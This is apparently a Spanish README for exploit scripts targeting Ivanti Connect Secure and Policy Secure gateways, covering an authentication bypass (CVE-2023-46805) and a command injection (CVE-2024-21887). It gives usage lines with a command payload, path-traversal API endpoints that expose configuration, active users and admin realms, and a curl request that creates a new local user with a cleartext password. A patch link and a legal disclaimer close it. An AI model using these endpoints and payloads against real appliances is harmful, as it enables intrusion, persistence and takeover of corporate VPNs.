
Una vulnerabilidad de omisión de autenticación en el componente web de Ivanti ICS 9.x, 22.x y Ivanti Policy Secure permite que un atacante remoto acceda a recursos restringidos al evitar las verificaciones de control.
Una vulnerabilidad de omisión de autenticación en el componente web de Ivanti ICS 9.x, 22.x e Ivanti Policy Secure permite a un atacante remoto acceder a recursos restringidos saltándose las comprobaciones de control.
uso: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

notas:
chmod +x CVE-2023-46805.sh
requiere las aplicaciones curl y json_pp
resultado si es vulnerable, deberías ver algunas cosas:

Una vulnerabilidad de inyección de comandos en los componentes web de Ivanti Connect Secure (9.x, 22.x) e Ivanti Policy Secure permite a un administrador autenticado enviar solicitudes especialmente diseñadas y ejecutar comandos arbitrarios en el dispositivo.
uso: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
resultado si es vulnerable, deberías ver algunas cosas y tu payload debería estar funcionando:

notas:
chmod +x CVE-2024-21887.sh
requiere las aplicaciones curl, xxd, tr y sed
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-crear una cuenta /authentication/auth-servers/authserver/System%20Local/local/users/user
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
Solución alternativa/Parche: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Créditos: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Aviso legal: IMPORTANTE: Este script se proporciona SOLO con fines educativos, pruebas éticas y uso legal. No lo utilices en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que realicen actividades no autorizadas están sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.